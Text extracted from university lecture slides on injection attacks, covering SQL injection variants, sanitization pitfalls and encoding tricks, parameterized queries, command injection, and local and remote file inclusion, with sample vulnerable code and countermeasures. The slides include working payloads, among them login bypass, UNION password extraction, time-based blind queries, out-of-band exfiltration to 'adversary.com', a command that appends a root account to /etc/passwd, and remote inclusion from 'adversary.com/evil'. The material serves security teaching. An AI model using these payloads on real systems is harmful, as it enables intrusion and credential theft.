ce441: data and network security - injection attacksce.sharif.edu/~b_momeni/ce441/10-injection.pdf2...

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

CE441: Data and Network SecurityInjection Attacks

Behnam Momeni, PhD

Department of Computer EngineeringSharif University of Technology

Fall 2019

B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 1 / 36

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

SQL Injection SQLi Exploitation Technique: In-band Data Retrieval

Outline

1 SQL InjectionSQLi Exploitation Technique: In-band Data RetrievalSQLi Exploitation Technique: In-band Inferential AttackSQLi Exploitation Technique: Out-of-band Data RetrievalSQLi Countermeasures: Input SanitizationSQLi Countermeasures: Parameterized Query

2 Command Injection


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Injection Attacks

When data items are converted from one format to another format...due to type ambiguityuntrusted inputs might be mixed by trusted inputs

...and change the meaning of the produced outputinjecting new control elements

XSS vulnerabilities were a subset of the injection vulnerabilitiesTrusted control element: “<a href=’/test.html’>...</a>”Untrusted input element: “$_GET[’title’]”

title=<script>alert(’XSS’);</script>When converted to the string format to create HTTP response

...injects new control elements (i.e. the <script>)

1 <?php2 echo "<a href=’/test.html’>$_GET[’title’]</a>";3 ?>


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Structured Query Language (SQL) Injection

SQL allows a web application...the Database client

to communicate with a Database and perform CRUDCreate new records with INSERT commandRead existing records with SELECT commandUpdate existing records with UPDATE commandDelete existing records with DELETE command

Formatted as a string and so vulnerable to type ambiguity issues ifdata inputs are not properly encoded to be distinguished from theSQL keywords


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


SQL Injection (SQLi) – Example Vulnerable Code

1 <?php2 $mysqli = new mysqli("localhost", "my_user", "my_password",

"database_name");3 if ($mysqli->connect_errno) {4 printf("Connect failed: %s\n", $mysqli->connect_error);5 exit();6 }7 if ($result = $mysqli->query("SELECT Name FROM City "8 . "WHERE Population < " . $_POST["max_population"])) {9 printf("Query returned %d rows.\n", $result->num_rows);

10 process($result);11 $result->close();12 }13 $mysqli->close();14 ?>


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Basic picture: SQL Injection

12

Victim Server

Victim SQL DB

Attacker

post malicious form

unintended SQL queryreceive valuable data

1

2

3


Borrowed from [40442-971:09-web-site-sec.pdf], page 12

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


15

Example: buggy login page (ASP)

set ok = execute( "SELECT * FROM Users WHERE user=' " & form(“user”) & " ' AND pwd=' " & form(“pwd”) & “ '” );

if not ok.EOF login success else fail;

Is this exploitable?



.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Web Server

Web Browser(Client)

DB

Enter Username

& Password

SELECT * FROM Users

WHERE user='me' AND pwd='1234'

Normal Query



.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


17

Bad inputSuppose user = “ ' or 1=1 -- ” (URL encoded)

Then scripts does: ok = execute( SELECT …

WHERE user= ' ' or 1=1 -- … )

■ The “--” causes rest of line to be ignored.

■ Now ok.EOF is always false and login succeeds.

The bad news: easy login to many sites this way.



.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


In-band Data Retrieval: Error-based SQL Injection

Improper error-handling allows adversary to observe SQL queryerrors

...observe actual data values

...and learn the query structurebased on the observed errors

e.g. to learn the query structureYou have an error in your SQL syntax near’12345678, 123.04, 0, )’ at line 2.

e.g. to learn the actual data values...compute the actual value in a subqueryand use it in a way to cause an error

SELECT * FROM Users WHERE username=’ali’ ANDEXTRACTVALUE(rand(),CONCAT(0x0a,(the-sub-query)))--


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


In-band Data Retrieval: UNION-based SQL Injection

Sometimes, the error message is not shown to userBut the query results are displayed themselves

e.g. player’s scores in a game

Extra information from other tables can be extracted...using a UNION query

1 SELECT lvl, score FROM Scores WHERE player=’ali’2 UNION SELECT username, password FROM Users


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Second-Order SQL Injection

When untrusted user input is stored in the database...by proper escaping and without causing SQL injection...it might be read back and used in yet another SQL query

If developers wrongly trust the data (which is read from database)...it can cause a second-order SQL injection

1 UPDATE Users SET password=’newpassphrase’2 WHERE username=’admin’ AND password=’oldpassphrase’34 UPDATE Users SET password=’newpassphrase’5 WHERE username=’admin’ --’ AND password=’random-password’


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


SQLi Is A Functionality Bug Too

A subset of inputs (which corrupt the query ) cannot be used

Image Ref: https://www.xkcd.com/327/


https://www.xkcd.com/327/

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

SQL Injection SQLi Exploitation Technique: In-band Inferential Attack

Outline


2 Command Injection


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


In-band Inferential Attack: Boolean-based

Sometimes, data cannot be retrieved directlyNeither error messages are displayed..nor query results are shown to users

But the rendered page reflects some state read from the databasee.g. when query is not well-formed, a generic error page is showne.g. when query has some non-empty results, a button is enabled

These boolean-based differences (normal page vs. error page)leak a single bit of information about the databaseAlso called a blind SQL injection


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


In-band Inferential Attack: Time-based

Sometimes, the state of the database, independent of the SQLinjection, is not reflected in the HTTP response

e.g. a second query blocks/abandons SQL injection resultsAlthough not even a bit of information can be extracted throughthe HTTP response body, the SQL injection can affect the overallresponse time

If a true or false condition is detected in the injected query, it mayrun through a fast or slow path to differentiate two scenarios

1 SELECT * FROM User WHERE username=’admin’2 AND password=’1234’3 OR IF(SUBSTRING(password,1,1)<’h’,SLEEP(2),0)=0 --’


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

SQL Injection SQLi Exploitation Technique: Out-of-band Data Retrieval

Outline


2 Command Injection


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

SQL Injection SQLi Exploitation Technique: Out-of-band Data Retrieval

Out-of-band Data Retrieval

Data exfiltration is possible through an independent channele.g. writing into a file which is served by a HTTP servere.g. exporting to a remote server directlye.g. loading data & leaking some data through the URLe.g. leaking data through a DNS request

Significantly speeds up the exfiltration process (in comparison toblind scenarios)

but requires FILE privilege which might be unavailable

1 SELECT ’any-data’ INTO OUTFILE ’/var/www/html/data.txt’;2 SELECT ’any-data’ INTO DUMPFILE ’\\\\1.2.3.4\\data.txt’;3 SELECT LOAD_FILE(’\\\\1.2.3.4\\somedata’);4 LOAD DATA INFILE ’\\\\1.2.3.4\\somedata’ INTO TABLE Temp;5 SELECT LOAD_FILE(CONCAT(’\\\\’,6 (some_query_with_one_row_result), ’.adversary.com\\’))


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

SQL Injection SQLi Countermeasures: Input Sanitization

Outline


2 Command Injection


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


SQLi Countermeasures: Input Sanitization (1/3)

The untrusted input might contain SQL keywordsSolution 1: detect and remove SQL keywords

Pitfall:SELINSERTECT → SELECT


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



The untrusted input might contain SQL keywordsSolution 2: enclose input in quotations and escape quotations

e.g. username=’1\’ OR 1=1 --’

Pitfall:username=’1\’ OR 1=1 --’

→ username=’1\\’ OR 1=1 --’


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.



The untrusted input might contain SQL keywordsSolution 3: use a library to properly escape quotations

1 <?php2 $username = addslashes("’ OR 1=1 --");3 $query = "... username=’".$username."’ AND ...";4 ?>

Pitfall: Encoding Attacks!


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Encoding Attacks: The Homoglyphs Feature!

The Microsoft SQL Server supports Unicode characterse.g. the NVARCHAR and NCHAR types or N’strings’

During implicit or explicit conversion from a Unicode type to anon-Unicode type, SQL Server automatically replaces characterswith their most visually similar counterparts (i.e. homoglyphs) inthe target character set

1 # http : / / sql f iddle .com/#!18/9eecb/635752 SELECT CAST(N 'ŚℇℒℇℂƮʼ ' AS nchar) AS UnicodeChar ,3 CAST(N 'ŚℇℒℇℂƮʼ ' AS char) AS NonUnicodeChar

UnicodeChar NonUnicodeCharŚℇℒℇℂƮʼ SELECT'


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Encoding Attacks: Non-Shortest Form UTF-8

UTF-8 characters use a variable-length codingOne byte for common latin charactersTwo bytes for most of the other languagesLonger codes for rare symbols including emoji characters (U+263A)

It is possible to encode any one-byte character using a two-bytecharacter too, but it is illegal to use these non-shortest forms

The single-quote character is represented as 39 (0x27)...it can also be represented as 0xC0A7

The addslashes function scans for 0x27 bytesSolution: mysqli_real_escape_string

#CodepointBits

First ValidCodepoint

Last ValidCodepoint

Byte 1 Byte 2 Byte 3 Byte 4

7 U+0000 U+007F 0xxx xxxx unused unused unused11 U+0080 U+07FF 110x xxxx 10xx xxxx unused unused16 U+0800 U+FFFF 1110 xxxx 10xx xxxx 10xx xxxx unused21 U+10000 U+10FFFF 1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Encoding Attacks: Consuming Escape Characters

In Asian encodings such as Guojia Biaozhun Kuozhan (GBK), anstandard for the simplified Chinese characters, a valid multi-bytecharacter might have the escape character as a suffix

0xBF0x27 (where 0x27 represents a single-quote in ASCII) mightbe escaped by adding a backslash which is represented by 0x5C inASCII

→ 0xBF0x5C27But 0xBF5C is a valid Chinese character in GBK...→ 0xBF5C0x27 (non-escaped single-quote)

In UTF-8, no multi-byte character might be terminated by 0x5CHowever, a wrong implementation might consume extra invalidbytes (0xC0 byte indicates a character with two bytes which mightconsume the following 0x5C; even though it is less than 0x80)


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

SQL Injection SQLi Countermeasures: Parameterized Query

Outline


2 Command Injection


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

SQL Injection SQLi Countermeasures: Parameterized Query

SQLi Countermeasures: Parameterized Query

Root cause of SQL injection vulnerabilities was the type ambiguityIt can be fixed by not mixing the query and user inputsInputs are passed separately as parametersQuery is prepared beforehand and can be reused

...(re)executed with a set of parameter values

1 <?php2 $stmt = mysqli_prepare($link, "SELECT username FROM Users

WHERE username=? AND password=?");3 mysqli_stmt_bind_param($stmt, ’ss’, $username, $password);4 $username = $_POST[’usr’]; // variables are linked5 $password = $_POST[’pwd’]; // by reference6 mysqli_stmt_execute($stmt);7 mysqli_stmt_bind_result($stmt, $res_username);8 while (mysqli_stmt_fetch($stmt)) {9 printf("%s\n", $res_username);

10 }11 mysqli_stmt_close($stmt);12 ?>


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

Command Injection Remote Code Execution (RCE)

Outline

1 SQL Injection

2 Command InjectionRemote Code Execution (RCE)File Inclusion


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Remote Code Execution (RCE)

Dynamic evaluation of untrusted user inpute.g. a calculator...requires careful input sanitization to prevent code execution

1 <?php2 $f = $_GET[’formula’]; // 2+3*43 eval("\$f = $f;");4 echo "Result: $f";5 ?>


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Code injection using system()

Example: PHP server-side code for sending email

Attacker can post

OR

$email = $_POST[“email”] $subject = $_POST[“subject”] system(“mail $email –s $subject < /tmp/joinmynetwork”)

http://yourdomain.com/mail.php? [email protected] & subject=foo < /usr/passwd; ls

http://yourdomain.com/mail.php? [email protected]&subject=foo; echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls



.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

Command Injection File Inclusion

Outline

1 SQL Injection

2 Command InjectionRemote Code Execution (RCE)File Inclusion


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Local File Inclusion (LFI)

Server-side script might run a sub-script based on user inputThe sub-script is locally present in the server

Adversary might be able to choose & run unexpected scriptse.g. some script from another folder (directory traversal)e.g. some text file which was uploaded by adversary beforehand

1 <?php2 include("subroutines/" . $_GET[’routine_name’]);3 // ../../private/authorized/backend.php4 // ../upload/evilshell.txt5 ?>


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


LFI Countermeasure

Do not pass user input into the file inclusion constructsBut check the user input and use some constant string based on it

Suboptimal solutions:limit the file extensionmitigate relative paths

1 <?php2 if ($_GET[’routine_name’] === ’register’) {3 include("subroutines/register.php");4 } elseif ($_GET[’routine_name’] === ’greet’) {5 include("subroutines/greetings.php");6 } else {7 die("bad routine name");8 }9 ?>


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Obtaining Source Files Using LFI

If adversary can select arbitrary schemes for an LFI caseOne possible selection would be to enable PHP filtersRef: https://www.php.net/manual/en/filters.php

For example,http://example.com/index.php?f=php://filter/convert.base64-encode/resource=index

...the index.php resource will be base64-encoded and returned

1 <?php2 include($_GET[’f’] . ".php");3 ?>


https://www.php.net/manual/en/filters.php

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.


Remote File Inclusion (RFI)

When no prefix is used while specifying the included file URI,adversary can use any scheme and include remote files too

In PHP, the allow_url_include should be on for RFI to work

Remote (hosted) script is downloaded and executed by the server

1 <?php2 include($_GET[’routine_name’] . ".php");3 // http://adversary.com/evil4 ?>


.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

.

References and Further Reading Bibliography

References and Further Reading

[40442-971:09-web-site-sec.pdf] Mehdi Kharrazi, “CE 442/Computer and NetworkSecurity – Lecture 9 - Web Application Security,” Sharif University of Technology, Online:http://sharif.edu/~kharrazi/courses/40442-971/09-web-site-sec.pdf, 2018

[homogplyphs-injection] Bert Wagner, “ʼ;ŚℇℒℇℂƮ *: How Unicode Homoglyphs WillBreak Your Custom SQL Injection Sanitizing Functions,” HackerNoon, Online: http://hackernoon.storage.googleapis.com/%CA%BC-%C5%9B%E2%84%87%E2%84%92%E2%84%87%E2%84%82%CA%

88-how-unicode-homoglyphs-will-break-your-custom-sql-injection-sanitizing-functions-1224377f7b51,2017

[overlong-utf8] Eduardo Vela, “A couple of unicode issues on PHP and Firefox,”SirDarckCat Blog, Online:http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html, 2009

[consuming-utf8-bytes] Chris Shiflett, “addslashes() Versus mysql_real_escape_string(),”Shiflett Blog, Online:http://shiflett.org/blog/2006/addslashes-versus-mysql-real-escape-string, 2006


http://sharif.edu/~kharrazi/courses/40442-971/09-web-site-sec.pdf

http://hackernoon.storage.googleapis.com/%CA%BC-%C5%9B%E2%84%87%E2%84%92%E2%84%87%E2%84%82%CA%88-how-unicode-homoglyphs-will-break-your-custom-sql-injection-sanitizing-functions-1224377f7b51



http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html

http://shiflett.org/blog/2006/addslashes-versus-mysql-real-escape-string

ce441: data and network security - injection attacksce.sharif.edu/~b_momeni/ce441/10-injection.pdf2...

Documents